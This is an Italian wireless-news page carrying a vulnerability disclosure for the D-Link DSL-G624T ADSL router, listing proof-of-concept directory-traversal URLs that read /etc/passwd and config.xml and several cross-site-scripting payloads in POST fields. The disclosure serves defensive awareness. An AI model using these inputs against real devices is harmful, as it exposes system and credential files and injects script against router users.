Home arrow Wireless Business arrow Individuata vulnerabilita' D-Link DSL-G624T ADSL Router
Notizie flash
Da voci di corridoio pare che lo standard IEEE802.11g verrà ratificato nel mese di maggio 2003. Novità da Texas Instruments.
 
Menu principale
Home
Forum sul Wireless
Iscrizione Newsletter
Rimozione Newsletter
Wireless nei Comuni
Contributi Audio sul W.
FAQ sul Wireless
Sicurezza Wireless
Guide sul Wireless
Recensioni Hardware
Web Links
Sperimentazioni
News Generiche
Wireless Business
Hardware Wireless
Software per Wireless
Eventi e Manifestazioni
Normativa Wireless
Computers e Wireless
Sistemi Bluetooth
Comunicazioni dal sito
Glossario sul Wireless
Dicono di Noi
Press Kit
Audio Guestbook
Add to: Mr. Wong Add to: Webnews Add to: Icio Add to: Oneview Add to: Yigg Add to: Linkarena Add to: Digg Add to: Del.icoi.us Add to: Reddit Add to: Simpy Add to: StumbleUpon Add to: Slashdot Add to: Netscape Add to: Furl Add to: Yahoo Add to: Blogmarks Add to: Diigo Add to: Technorati Add to: Newsvine Add to: Blinkbits Add to: Ma.Gnolia Add to: Smarking Add to: Netvouz Add to: Folkd Add to: Spurl Add to: Google Add to: Blinklist Information
Social Bookmarking
Podcast

Individuata vulnerabilita' D-Link DSL-G624T ADSL Router Stampa E-mail
Segnaliamo una vulnerabilita' comunicataci da Luigi D'Amato admin di Securitywireless.info che riguarda i D-Link DSL-G624T ADSL Router (Firmware Version : V3.00B01T01.YA-C.20060616). Quest'ultima e' stata riscontrata in una mancata validazione di alcuni input da parte del device. Un attaccante remoto sfruttando quest'errore puo' visualizzare file arbitrari presenti sul router o eseguire far eseguire codice scripting ad un utente.

Esempi:

Directory transversal
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting
Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fstate
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: >">alert(20102006)%3B

Url:: http://router/cgi-bin/webcm
Method:: POST
Variable:: upnp%3Asettings%2Fconnection
Value:: "+onmouseover="alert(20102006)

Directory listing
Is possible to list the /cgi-bin directory

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616
 
< Articolo Precedente   Prossimo Articolo >
[Indietro]



Visita anche www.savoldi.com